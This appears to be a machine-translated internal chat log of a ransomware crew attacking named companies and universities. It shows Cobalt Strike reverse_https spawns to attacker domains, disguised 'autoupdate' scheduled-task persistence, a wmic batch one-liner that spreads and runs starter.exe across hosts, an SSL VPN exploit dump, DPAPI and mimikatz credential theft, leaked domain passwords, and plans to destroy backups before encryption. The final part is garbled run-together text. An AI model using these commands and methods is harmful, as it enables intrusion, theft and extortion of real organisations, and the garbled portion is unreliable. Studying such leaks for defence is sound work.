2 backups of the server with the listings removed. looked for the vSphere, then it crashed; first came back, knocked out the first one, changed passwords, then it crashed, then came back
a machine that does not have access to the domain, from the vpn no configs, no creds, a keylogger stood there, did not catch anything
checked mp?
sccy collected browsers from ALL computers, no thresholds
already not the first day with them
on sccy and ballymore write that it's done (remember, the vpn can not be turned on without a confirmation code, they have 2fa)
was in work
session alive
Detached from the company
Decided to take a new one
vsm gone?
if there's something to take, I'll take it, I've got a guy who left #corp-televisa-com-mx
sccy
ballymore fell off, I'm sure no one from the office came in either, but you'd better change it while I'm with user7
I'm late, who came at all? did everyone sleep at home? did I ask my friends about their domain?
```
01/28 12:07:45 *** sup has joined.
01/28 12:10:25 *** sup has left.
```
not
```
sup beacon> exit
[*] Tasked beacon to exit
```
@tl1 are you out of all sessions in the cobalt 172....218?
Hi all, tomorrow by 5
login_passwd
login_username
in snu.edu trying to get out of the vpn, I'm trying to get out of coppers with SMBGhost and a bunch of different rdp exploits I tried - all bypassed
how to order salt on hydra there) I don't know about hydra)
I'm trying to figure out hydra in #corp-televisa-com-mx, trying to break into any machine
@user9 for a long time went to the long distance to sort out the hydra, with the hydra to sort out, with the hydra how to brute web forms, another way to brute the web with the hydra, sort out without +
what are you doing) - brute, everything will be in sccy?
++
ssssssssssssssssss
who's busy?
http://helpdocpt.club/threads/some-cool-stuff-%D0%A1-pws-cna.38/
Since I was allowed into the garden - I commented on part of the thread, I put my modest remarks right in the first message so that one doesn't have to read the whole thread
can we chat at least?
the task for both teams today until 21:00, if you do gpj you can go earlier
you will now be in active practice, just with the aim of increasing rights; there will be cases where you will need to learn new things, where the standard methods will not work, and they just should be systematically added
a tangle. I think no problem, this is still a relative "order" of action; the question is the shortcut here, that is, the allocation of priority vectors and then secondary and tertiary ones - that is, more difficult to exploit and less common. in any case it looks confusing because, for example, the previous version of the diagram was difficult to bring to a sensible form. For infinite, most likely you will have to move to another platform or present it in a different way
The given mindmap is essentially the basis of the whole cycle of possible actions, that is, you can extend it almost to infinity)
then just develop it by vector with indication of the vulnerabilities used (both LPE and network ones)
the MsSql vector as a whole, what to add, I understand you already "see"?
but the beginning is correct, yes)) but promises without naughty)
I can give you my account (please send the login in PM under which you can read)
mind-map remaster http://helpdocpt.club/threads/mind-map-%D0%BF%D0%BE-%D1%8D%D1%81%D0%BA%D0%B0%D0%BB%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9.33/
the latest version https://www.xmind.net/download/
Until lunch continue yesterday's task on the mindmap and organizing instructions
:space_invader:
hii
Good morning
Good morning, good morning, good morning, good morning, good morning,
can you tell me in this what's her `pinellas.local` and me?
yes, in DM thanks
Good morning,
can I have a new Cobalt? Mine got busted.
there were two nets closed
:space_invader:
hi
turned on)
yes yes
Hello
user8 should be turned on, it's back
hhi
Hi, where is everybody?
goodnight, tomorrow by 5
but also nowhere to go, are there citrix admins
user groups - users? or servers? any other groups?
in #corp-televisa-com-mx moved from the entry point
No, checked all the servers and machines where there is access, from the user segment have not yet been able to get out to the servers
what have you done today?
AnyDesk autoupdate#39932 20/01/2021 05:31:07 p. Listo pjfrancocru sfe16537 corp.televisa.com the context of the usual unprivileged username.
aha, delete, deleted, left?
I just do the build and delete after downloading, I will say for sure
delete their last deleted log saves?
ahyhaxmasaka
but I see in the logs only 2 builds have been fixed, 3 pieces again the same, doesn't understand, have to get out to another machine to fix. that's logical, first work out those with - I'll fix it myself
ok, got it, the same crap
and I only interacted through injecting into the neighboring process; from the process it was only possible to work with the machine in another session. I have such crashes only on spawn, and cured
cobalt crashes
interact how? you write spawn
financial.local
benihana.com not anchored
247InTouchPCl.local is minus, you've been messing with it, nobody touched it anymore
cedarfinancial.local crashes the cobalt
so do we work the rest of them in the nets where 2 other people work?
if the old one is removed - ok
I told @user8 the old one is extinguished
sccy-lt04 sccy.com you put 2 builds here?
is
how to restart?
user context
sccy-lt04 sccy.com Microsoft Teams autoupdate#81727 1/20/2021 6:15:52 PM Ready ``
this netsch I restart in sccy.com
mine? 3 pieces and 1 did not arrive? everything? aga
all in place? yes
lf old deleted?
rebuild done?)
Microsoft Teams autoupdate#15903 20/01/2021 05:06:56 PM Listo
netusogr.televisia.com.mx 10.170.4.168 pjfrancocru SFE16537
is user context occdr occremote191 nk.spirit.com Skype maintenance task#13547 1/20/2021 6:07:49 PM Ready ``
Thank you, there's another thing ``midwestsign.com 192.168.11.166 jkielsa CTXA715-04
there is such a `CTXA715-04`
I need external domain + rights type (system, user), hostname
`Mitel autoupdate#82604 `
fix it
bluntly of course, I gave you several builds and the rule was not canceled + you gave access to do them
I gave you several builds, just did not compare + hurry up, as many times as I told you: 1 build 1 run. anyway, redo it faster
technical details why? you were told to do so, you should have asked right away... if it's the id then it is understandable.... I don't know if you could just give out 1 dll for all domains and not bother with the toolpanel
that's the point of generation, each build is unique and it has its own id. why? they still knock on the same domain?
I also asked if you remember how to do it, in ahuedll and schtask and delete all the old ones
need at least 4 builds now, a new build and fix
I'm still waiting for an answer, I see in the toolbar that the last build was built 1.5 hours ago, have you forgotten that 1 fix = 1 build? I will ask a very simple question + mount the same build ...?
tell me how long have you been binding
financial.local 1 = Skype autoupdate#35434 1/20/2021 5:38:26 PM Ready``?
192,168,0,2 Hgutierreze SFE18491 CORP.TELEVISA.COM.MX McAfee autoupdate#45234 20/01/2021 04:34:49 PM. En ejecución ``
+ are you building on both domains, yes?
corp.televisa.com.mx 10.170.4.168 pjfrancocru SFE16537
2
1 so far yes. about by which are they?
?`sCTXA715-04` never arrived ?
all dlls are there and schtasks too?
so far, both passed `midwestsign.com 192.168.11.166 jkielsa CTXA715-04`
as @user7's cobalt hung up with this session
u9 in solo mount? nk.spirit.com 10.0.0.20 occdr occremote191 any other mounts?
which were previously mounted also mark; the process, there was a little snack, something mounted?
so where there is no anchor - where anchored, write + the first character in the Note is the main anchor
possible. in which cobalt is the difference? in the entry one can?
but you had access to the builder before I did) clearly, just did not do so before
you are not going to work only with 4 networks? there's not 1 to 1, if all, I did not understand, do we need to fix all nets or only your own? only 2 nets. what else is fixed? add comments in the entry cobalt, corrected the above message in the general cobalt, do mark what is fixed there, I shoot, hell, you do spawn
@user8 look at the session activity, do you need to fix as many nets or not do it, right?
```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] tmevtmgr.sys Found
[+] TMUMH.sys Found
[+] 2 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] Trend Micro Inc Found!
====== AntiVirus ======
Engine : Trend Micro Apex One Antivirus
ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\NTRmv.exe
Engine : Windows Defender
ProductEXE : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
Engine : Trend Micro Apex One Antivirus
ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe
```
what's up with the av? no deletion of the deletion to fix and it's not flying to my cobalt. what domain? long, but it's not flying yet. what?
``Adobe SvcRestartTask#20900 1/20/2021 4:10:24 PM Ready ``
what's the name of the task? schtask? dll in place? yes, I made a new one and fixed it with the same build?
I don't see
10.0.0.59 system* sccy-05
I have this domain, marked; another session is taken and not signed
```
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
```
We're losing our job, we don't know it in the shower, but it's empty.
```
Teemo beacon> spawn https
[*] Tasked beacon to spawn (x64) windows/beacon_https/reverse_https (ownjar.com:443)
[+] host called home, sent: 261643 bytes
```
guys, I'm really asking you to mark the taken sessions
work and is fixed? main.crispregional.org
I opened the chat, no chat) if there is a chat, can you add the fix? ok, chat?
fix is ok, chat, i.e. it was not marked, I took it, and so is it `` 192.168.0.2 SYSTEM* SFE18491 CORP.TELEVISA.COM.MX ``
``CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P ``
and you can create a group with this domain `` 10.1.111.100 jgemperline BEN1064-MGR-10 benihana.com `` and more external domains please write
+ ah, everything. see the file and stack
173.234.155.15 192.168.75.175 https SYSTEM * CRRHORC19
no such thing... SYSTEM * CRRHORC19... system and company name or domainname... I need hostname? SYSTEM * CRRHORC19 okay. then you do not bother
For now, yes, I need to prepare the lab for tomorrow, but I'm around)
everyone okay with the builds?
if there is a domain admin at once, promptly collect hashes to brute for @tl2 and do as @user9
shall I switch module
yes, it worked
@user3 you're not with us yet, right?
```
{ { "domains": [ "kalarada.com", "tuxomibo.com" ], { "bit": "x64", }, "period": "15", { "lasthope": 65 } 
```
didn't help
relogin tried? give parameters from show?
the same crap, no download
not a single marked session, where are @user3 @user7 ?
fix promptly or you stupidly have nothing to work with, and domains
the toolpanel updated, builds went out, now fix to entry points
not marked, in the entry cobalt alive, not marked, any sessions in the entry one? 2 people and one has a dead session
you have windows, all don't bind me? ``` 4836 924 naPrdMgr.exe `` Then what av? elfkbkfcmdaa must be in the folder after the start?
I don't see
2 min
2 vby amongst the tasks
```
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Adobe Acrobat Update Task                1/21/2021 1:00:00 PM   Ready
AdobeGCInvoker-1.0                       1/21/2021 8:06:00 AM   Ready
G2MUpdateTask-S-1-5-21-1989139100-303601 1/20/2021 2:38:00 PM   Ready
G2MUploadTask-S-1-5-21-1989139139100-303601 1/20/2021 3:47:00 PM Ready
OneDrive Standalone Update Task-S-1-5-21 1/21/2021 11:04:46 PM  Ready
```
is there? already read above)) without DA
still yes, no session 173.234.155.15 192.168.37.115 https amypriest CRRHHHCC4
did you spell it?
where is it? then the session fell off
crack
Da
@all anyone here?
which are already there, there are 2 domains, it can be that there are several sessions from one network; always check the domain, now maybe the domains will change, don't run) before starting, tell where you start, so by the classic anchor the entry points; know how to start, do you know how to do the last one, just 65 interval from 15 to 20, just check both domains, questions how to use any? + see the new toolkit? made you a new section in the toolkit, would be very good to go at once up to DA and fix it)
dismantle? one is) empty...
entry cobalt
```
192.169.6.82 https://ownjar.com
----------------------------------------------------------------------------------------
185.150.190.153:49698 9AR3B4a2bORZSN28ST8wLqbH0F0Wvo5buE2
```
Be distracted for now, coordinate with each other, and into the chat clarifying questions and logs on the work, to try to close today, let's all work on balimore
fivea where is @user9 ?
@user3 was off
poca 4 how many are you?
balimore will spin, search NAS backups and stuff like that?
I can't find it, I can't find it, I can't find it.
minimizes bugs under the token, not plus; I would add DA, crosses to run wmic just in case, change it to cmd / ok, got it, remove gzpnez run. what is "run" anyway? run why?) and tweaked it incorrectly there c:\starter.exe, and by the way, better copy directly to the root. wmiexec_command (can't remember the exact name of the msf module, but something like that) they both even take hashes if you don't have cleartext at hand in any way. Then run them. you can just spread the "first part" of the batch files, you can also psexec-wise, you can wmic via DA, this will "go" easier. wmic really will not run from system. is a schtask necessary? wmic will not run this exe? easier? the second part where the schtasks is - awful. the first part ok. in files I had it from somewhere, ok. no? it's like right on the msdn there. so you wrote it, did you at least read the syntax of schtasks? some nonsense, it will not live by itself?
```
for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%%i\C$\Windows\System32\starter.exe && wmic /node:%%i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt
```
@tl2 add me in fusionfirst.local
+slypad flew
Guys, we have to wait until the working day in Texas is over, because we're already falling asleep, my head does not work... and in general, what I meant about a "sensitive" network - rather serious event monitoring, where the whole network is covered by EDR agents, monitoring systems, and other stuff. and again...
hacking is a thing that is "not static", something will close - something will open, which is little different from real hell. Azure clouds just provide their Azure AD right out of the box. Microsoft is moving towards the introduction of their clouds in the first place, if we talk about a "not small" network. with these settings it's impossible to administer, roughly speaking, this network simply will not work.
@user1 what you described is not possible in practice. I expect the enemy will freeze and lag. masses are still a little too much work with "sensitive" networks - but when it comes to these... in general, you already understand that you can "break everything" even with a VPN. and sometimes this is the only method... there will be many cases where it can be used outside the context of specific users by manipulating, even remotely, the file system and domain. a huge plus; here guides are inappropriate, slightly too "direct", because it is one of the key storage mechanisms of creds, the essence of the DPAPI attack. this is a question you should ask yourself)))) rhetorical question :grin:
fuck, I spent all night on this masterkey and did not get anything in the end
throw all in sprouselaw
added) tell me who to add to this chat
it's time to add all of us to this chat so no one there did not add something
@user7 if it applies to any network - please throw it in the appropriate chat
stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM/
is mimikatz able to change it back to the known one? no, password ok. but how to change the hash? you can do it with . you can just go through the cmd data. I don't know where to go more)) change the user password) lol. or the question is how to do it more conveniently?
and can you elaborate)) on the hash that he had, change it, then go back to him under 1qwerty1. I searched for configurations, did not find (you can set the user NTLM hash of any known cleartext password `` `` so you're looking for a cleartext, plus you can set your password hash to a user and then change it back ``` I think I wrote it clearly.
config searched for Passwords Plus itself? under the right user can not log in under NTLM, and deployment in your own place and full download of the folder with the client, there are a million variants that "no"? on RDP tried to go where the client stands? if it's not possible to erase it, then it's not possible to enter where the client is standing, so look for cleartext, plus you can set your password hash to the user and then change it back. no cleartext from rdn and no connection via NTLM? the client that sends @user9 to the cloud with web authorization? with the cloud - look for the cloud and work there - everything is simple here. If you can't overwrite it, it means there's nothing on our network yet... all the computers have been searched, people don't leave passwords in chrome files. there's Passwords Plus - they store passwords there, but it's in the cloud and you can't get it
BUT you can fight them, they might be available through some interface and you can overwrite all the tapes, there's even a demagnetize function in the console sometimes) these cold tape backups are probably the hardest, and often impossible to solve, and they usually have EVERYTHING related to av/backups/directories of servers. most often all this is managed by 3-4-5 people even in large networks. the main and most important! the most important thing is to study the contents of the machines/home dirs/browsers of the IT people. Only with experience will you figure out how to work with them. just read the docs... veeam, acronis, Iron Mountain, etc. practically everywhere +- the same backup is used. in general, as for the backup @user9 yes.
here's an example of a fucking backup. well get it. yes, java gobbling it up. decide 4 gb max 2x24x4 cards? comps are ancient. yep, 16 gig total? ddr2?????? we have ddr2 in 4g slots, no more. and some motherboards do not support more?
``` Acronis Backup 11.7 Management Console 11.7.50058 ```
"Worse than Explorer on Windows." Okay, I heard about the RAM, but it's faster. The fucking RAM is eating everything. I'm running out of RAM. What does System Load show? does it gobble up RAM?
```
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * Using CryptUnprotectData API
 * volatile cache: GUID:{de823842-69eb-4af0-a1b0-d6b9625b796f};KeyHash:883bc94ae7ab70b09830fab37259abfc3cdf7fc9;Key:available
 * masterkey : 51a6f051e98d0d633d79bacbb355e3a5712c4f8a14f31fe332bb587047635a22e19cce783bb6cf8927eb9b590159f059e069a26186ce651e3aba7db2481f04d1
Password:
```
```
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * using CryptUnprotectData API
 * volatile cache: GUID:{2539f04d-b7c0-487a-97d8-c818e2889122};KeyHash:003f69a0852d9f879bebbfe1aaad91d7fcac9b34;Key:available
 * masterkey : fa0ee6549e47088279eafd681cc050d2f5f15a2618d818c9f286532ceeef0c10aaf31c26d4d4a5d1e226380e383a8626fd1cbaf4d165e47a75791a809adb682a
Password:
```
:zany_face:
Computers hang demonically! You can not just open the Cobalt browser and notepad!
`8. you have three now, do you need more? if so - tell me which servers and how many you need` as needed
so, gentlemen, on the questions
1. smb_login with creds on the DC / net use on the DC / login to outlook or webmail (if domain authorization is tied) / ldap_login (https://github.com/lanjelot/patator) e.g. by patator
2. First part - the rudimentary LM hash, you can safely forget about what it is, what we have is and will always be the same; the second - the NTLM hash, actually the one that we often use for authorization
3. will be later, you can set up tasks through the admin interface for hash decrypt and bruteforce of passwords/docs/excel files
4.
https://github.com/0xthirteen/StayKit - all the persistence techniques are described here and divided into categories and levels of privileges; there's nothing to describe here in more detail, there have been no "unique" techniques for Windows systems for years. There are alternative things such as web shells on web servers (this is aspx code which is placed on the webserver, in this case IIS where the functional application "lives" - most often and most conveniently placed on the Exchange), there is an IIS module. So far, stop at StayKit because it gives insight; in the future I'll just give you a handy tool to persist simply by running a dll
5. everything on the network is administered by people. the key to getting the most detailed data on the studied IS is in the admins / network engineers. That includes diagrams and accesses and everything else. You can only use them to identify cloud or tape backups, or circumstantial evidence (services/tasks on critical servers, AD records, etc.).
6. the question is incorrect. it does not "need" to be done, smb_pipe is essentially just a kind of payload which is +- technically equal to a bind payload in metasploit, used for machines with authorization restrictions or for machines unable to give access outside the standard http(s)/dns/tcp protocols, that is, jump psexec(_psh) 10.0.0.1 pipe is a service creation for a bind pipe which the initiating machine then connects to
7. I'll give you the builder of the dll files
8. You now have three of them, do you need more? If so, tell me which servers and how many you need
9. Why does it hang? I do not know.
192.168.100.240 192.168.100.238 192.168.100.248 192.168.100.237 192.168.100.245 192.168.100.230 192.168.100.219 192.168.100.228
``SPROUSELAW\administrator 1ylft1tmtS_6963 ``
All right, I've been kicked out of the new rocket, I'm alive now.
```
[+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv
[+] Leaking sessions to dump configuration.
[+] Found: SessionID: P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck= userType: 1 userName: hemrick Password: HEcbccanal20201996 Domain: CANALBARGE
[+] Done with https://50.233.57.77, found 1 sessions
1
[+] Saving session data
[+] Trying session P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck=
[+] Saving config to ./Dumps/50.233.57.77/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data
[+] Finding users
[+] Found 209 users
[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds :@10.0.10.12
[+] AD creds :@10.0.10.12
[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.
[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data
[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 115, 'name': 'net extender', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jhecht'}
```
into the access.
1. https://50.233.57.77 2fa, there's nothing in the bookmarks, backup codes don't work
``` Try to add your bookmark here ``
2. https://173.247.171.106 - #grantweber-com have access to the NAS and to the AV, not to the vSphere, looked everywhere, can close
172.81.67.174 (retif.com) no creds from the NAS, that's in work from them (skype ip), and at what stage or for what reason is it not in work
3 VPNs issued, so tell me
tips hotpay, friends, really want to sleep, very hung up today
tomorrow, tell @tl1, he will order a new one and shoot this one if there is trouble) or a new domain, I don't know)
fix the cobalt please
5 minutes it hangs on, then resets again
user4 session alive
I think I have a problem with the cobalt domain
lists of all LAs wherever they were taken, send them to the group
yes, almost the same everywhere and do not roll on the server
from all 10 were taken off LA?
10 + and how many users?
and check just net view on this host on the user's. go.
and on the user's?
in DM write a new password; access to change the password where he writes that he has access to the shares admin$ remote and tds what servers? without a domain not allowed, but we removed users from the servers, and there is no this user and his group without a domain? yes, it says just smb_login, what does it say to these hosts? and have you checked all hosts?
user8 no, I will not say the parameters, and the context was microadmin (nddevbernst)
and what was the context at the time of launch and the parameters? but it does not go there, no, many where admin shares, there was above output
user8 ran, all outputs did not work lol you have not run before? there are 20500 pcs)
Invoke-ShareFinder works, but tightly. see the domain?
```
beacon> execute-assembly /home/user/TOOLS/2/SharpShares.exe shares
[*] Tasked beacon to run .NET program: SharpShares.exe shares
[+] host called home, sent: 117815 bytes
[+] received output:
[*] Parsed 0 computer objects.
```
Is there anything you can do about it?)
**deadly wait** sessions will not wait for the file in the sys32 directory and disallow its deletion.
The "poc.exe" simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)
this is what I don't understand, it seems to move the dll to sys32 and ros.exe to run it; it not only moves it, but runs it as LA; to the file, and it gives us the ability to run it as an admin, we have access only to this file and it's there, ok, we run it as a user without permission, it gives you user rights if you're an admin?)) and not vice versa?
And in this case we have rights to run our file from this path. The point is that this sys32 is in the admin$ share, and if you have access there, it gives you admin/system rights.
It's clear. But as I understand, the whole point of this movement is to put your file in system32 without rights. And then this fact should be used in some way. But how is not clear. It seems that you can run applications from it which UAC will not swear at, but I am not sure) because according to the author's article, when the ntuser.pol loop works it removes the file from system32, but its essence is that it monitors when a file is created and prohibits its deletion.
exe?
as far as I understand it is very simple, but I could be wrong
well, it exists now, but in new sessions not a fact)
Well, the implementation is a little bit vague)
I read, but did not find users on the computers. Yes, and system is everywhere
who checked? still the same at 10 +-
current users are nowhere else LA?
with what? by the way, what about the av? about what time?
still the same, can not get DA and can not get on the machines that interest us, so what do we have on the current network?
aha ok, yes, a week ago + I told you all the new cobalts? a little later I will say, new sessions today will be
got it
on Tutu 3 again I fucked up... those who are in the network now: I, 4, 7, 9. user8 is sick. 4) I have rocket lag or are you only 3 now?
Hello
Hello all, on the new one now; to clarify - while with the old one, let me refine. the old one doesn't know where to go to the old one. Yes, while in the old one. Will there be a new one?
hello everyone) are there sessions to work with?
Hi. pleasant rest, in touch
well, so even I will have time to sleep myself
in the office 15.10 at 13:00-14:00 Moscow time :space_invader:
now clean up only... if I can, tell me the time plan because I don't know and I need to set the alarm clock; leave when you come to fill the builder dll
ok, and then turn me off here for another 7-8 hours; in any case I'm dead here, alive but not alive at the same time) all like zombies, need to sleep normally. would like to tomorrow, or tomorrow I'm confused
Tomorrow, what time?
Before tomorrow, let's go around 11; I think tomorrow will be sorting out current cases, and the day after tomorrow maybe something will go to the block?
Tomorrow by what time, and tomorrow at what time?
at 22, yes, then wrap up for today
@tl2 At 22 home?
No, in principle, it's almost 22...
@tl1 said what time tomorrow? What time?
work in the morning
sorry guys, my rocket failed and I did not notice; if anything - write if there are any urgent issues
need to prepare for closing
Give me your dll, I'll throw you on the network and create a chat
@user4 for you a separate task will be file sharing, ways to transfer files and other things; I hope I do not need to explain that you do not shine your resources under the umbrella?
you can get from /16 from here
dns?
@user7 check the tab gohosts
ok ok, I understand my stupor, now everything will be
you're strange) throw the networks where you have not yet reached a dead end and then you have no work) and the DC that you get from the scan, subnets, scanning results when you are connected to a VPN, you can quite work with bloodhound?
it won't even ask for DA without an rdp ``` of course I asked you what to do, you have several accounts, there are scanners, and you know how to work with the vpn, how to work there; there is a working vpn. I understand when the username/password did not fit, yes. I said that you are responsible for them? I had to directly supervise the operation?
"let go" I figured I was just a questioner here, so he wouldn't even ask for DA without an rdp; there were work options anyway. why did you let @user7 off so easily + I figured you and @user8 were still together, and why not work with it?
tried rdp, does it authorize itself under these creds?
tried rdp, so no user can walk on rdp
in `lrhc.org` enterprise admin rights appeared in the neighboring domain, half a day tried to remove the ADinfo. Now in the next domain found a machine with a 2003 server, ms17 commands work, we think to add a local admin there and then work on
in my last one there were 2 users. from one the creds did not fit, the second is 2fa. so for now working with @user8
well, how are you doing?
if there's progress on the current nets without a chat, you collect information from yourself locally, as soon as I come I'll immediately create one
I need to leave, I'll be back in close to 6 hours + write me back in DM the names of the folders that were inside the archive, all the rest in personal info. how many files :thinking:
@user8 you're in control of their tasks, I'll ask you) he's the chief in this problem for now; general attack questions to @user8
yes, just I guess I do not quite understand the indirect work. we sit next to each other) if you mean that?
I can give you 3 people a general question chat, they'll have their own nets, why come to you in the chat?
@tl1 since @user4 and @user7 are with me, can you put them in the chat?
around 6 or 7 I'll give the network with the DA and we'll prepare it for closing, for the most part today independently
I'll give you files like his yesterday; for all questions please contact him. @user4 @user7 you indirectly work with @user8, @user8 with his. so @user3 works with the forum
I can not go further, can I help user8? Yesterday I had no access to the cobalt
Filling the forum with what? by the way, what are we busy with?
then I'll explain the tasks for today + so, all gathered? hello all, wait 20 minutes and then start
nobody on the spot? hello all, hello
Still no sessions? what about the sessions?
@tl2 maybe you say something? @tl1 Any good news? do not know yet @tl1 Sessions will be? ``` beacon> shell net user ndevbernst /dom [*] Tasked beacon to run: net user ndevbernst /dom [+] host called home, sent: 56 bytes [+] received output: The request will be processed at a domain controller for domain jdossn.local. System error 1355 has occurred. The specified domain either does not exist or could not be contacted. ``` Today almost all of the offreleases' comps didn't give anything either no web services found, no whining either let relay and went home)nhii what did yesterday's results? hello all know that @user9 has yes asked how many networks with YES do not rise@user3 you have with YES network? I said no doubt I can not sayI have 1 YES real network 1 network.and tell me how many networks with YES got that no doubt normal networksI work help colleague will faster I work more 3 people +++ no more sessions so all worked out what was it?quit it i don't see any real users there you got further into the domain? or not....humankind will be like labavo no free as it looks like that yes whether laba or something else there + mostly 7/hrs i don't like it yes@user9 ? no trusts you say? make a conflate plzstateoilcompany.com - strange network 34 users, 66 computers, no trusts can i getstateoilcompany.com ?I'm not sure if I've got a new one, but I've got a new one.com I'm still the only one who works with it? ballymoregroup.com confab check it out guys there is a session with a local admin zazl not touching it priorityes it but I took ballymoregroup so what to take, zazl or ballymoregroup? 
ballymoregroup take it to work there's a big case can be for two at a timeadinfo taken off still get a taxi? well, i did not believe it) `` >mail: tyler@gaudyme.com ``Ah ouch''. >userPrincipalName: destineeg@DressinGaudy.local ``I don't believe it,`` in the adinfo suchDressinGaudy.losale more +3 sessions and configs too from that domain have 3 cars 2 has a client, but configs on them do not see and they are now dead on the last client does not sit sitbelt is silent? config and does not smell of it in bluegrays alive there is a computer without a client vpnapodlecu who took rtpcompany.com there is a second session you do not write in the comment your domain koba, there is written externalnikBK new bots 15pcs do confuber work take whoever.com10 minbrbr newbots are in bkHowever sexy all off that you can kidajeet more sessionsfrom him on the tachka look for vpno is bluegracegroup.comadinfo no as not visible domain hurriedly))com`brighthorizons.com` confi pleaseDo spav https://neteric.com not come you'll laugh, but in adinfo no external domain if you pick up then writekobel.com - confi already forgot how to do it? domainvneshneed to give confi TomHolzerFord.local take awaykobel.com take away here in the netcob and work here sessionsAnd work with what? mine by the way, flew in, although before did not want to. 
they clean daona empty the rest in the shit after closing the gridthere are only 2 so far clean not personal took Divide into groups by the way a couple of cubes workers are red, so where there was already spawn do not touch Get the cobb up? oh, what a good time to fix it, you know you have to take it before they fall off if you already have a session in the cobb da fuck with this microtic, will soon be ready to do what?general alg you already know) Okay, but I want the map to reflect the nuances of the situaDa rdp came and raschal Well I can describe here is how it was today So there's a situation review later or how to be with non-attractable servers How to be on the server without charThere are now busy problem with the internet and here is the motive for the question just so you do not get mixed up in the algorithmto leave all if it helps youI am an artist I see so This is my vision a, even so the right algorithm on the left tips How to start Well, the beginning of this turn in a token can take the command outside the map true, to reduce the size you're still at hand bats and so dto leave it if you understand and 1 line is a turn in the token) the beginning of the map turn in a tokena little strange you got a ok if offsite av and other things why? 
faster would be to scatter ephemera I think the same way from 100 mapping in both cases and if you have not found it, then only mapom if 100 then it is better to otkl av + win def and scatter ephemera if to 100 servers you can get along just the same only mapovoreally here an important aspect of this?so will dozabyla forgot i do not see the division to 100 servers and from 100chem to change? report as a router will beroadmap, waiting for a routerpodobytesya what to do so i will add you a new tul `https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion` please send me your names from here. ``Well, I don't remember the hostname and I can't get into the koba yet.`` now throw the kobu in the history of bicon no unions do not see `` beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. 
The command completed successfully. you gave the cob above I thought it was she and isto me to compare it nowhere else exactly where you mapped to dumping) ah, so you need to throw the coba, so immediately would have said)) and check whether the maps remained after I wanted to see the place where you pamiely before dumping.she and I was interested)in the coba no net or no in the coba? 
because I may have it in the one that fell off mapiltekonnect only in myteb no at allTESTCONNECT.lrhc.losal or here do not remember exactly, but here like mapil TESTWEB.lrhc.losal to check if they are still there I am interested in the host where you mapped from the list i want to check if there are any mapps left before the cipher started, then i went to another cipher and told him that the first koba fell off and there mamapilosya not kobamapi in question because the vpn fell off and did not have time to check this is it? ``now there are no cob connected to the hostname where mapped before the collapse did not have time to check the case when the cob fell off? to the question of this ``arms: 791/1040 mapped, the cipher in question `` with a possible extension to 12 by the time until 10 we have until what time today? in order for you to estimate this time when closing large volumes of data and general info: cipher speed ~20-40 minutes to 1tbokay+ all clear?yes, understood? 
there is 1 main domain and several secondary domains and you estimate these links as default between all domains you forget to analyze the bundles of domains from small comments see his circle of users by groups and you see more tróós poznachennyh people in the network, also important to watch and there were interesting files on your computer and among them already found chrome login: root pass: -you then discounted a memberof one Dan would have been longer if you had not given a tipI thought I would have to spend my last day off to work) for Saturday solved the problem with the spheremodelshafto immediately I want to mention such moments as reseche network on that probably all and put off the network after all servers have pulled in already will not work that will extend your online lifetime for an hour or more just times less you will still noise whether or not it and immediately this question if you have + + idea is understood?the main thing is that the server is unreachable, the calls of employees are unavailable, everything is slow, the network is frozen, another conversation it's like, until you log on and go to the snaps section, if admins are so pedantic that they go to check snaps every 10 minutes or they might not get it?I understand that it's a scare on the net, but when we've already shredded the avs, lost snaps, does it make sense to hide?or will not notice that the network freesitka how long the admins will not take a head360k requests per hour500 requests every 5 seconds excluding your internal (a la mapping and vmik to open)100 servers in the network and while you are working with them 1 hourk how it works on the numbers just so you understand that the client dropout is not simple ping it quite a full-fledged request in the slip because inject should be done almost simultaneouslyeven if you worked in a command and while I was pulling the other mappings to the servers are already drawn and while pulling more additional servers, the old flurry you 
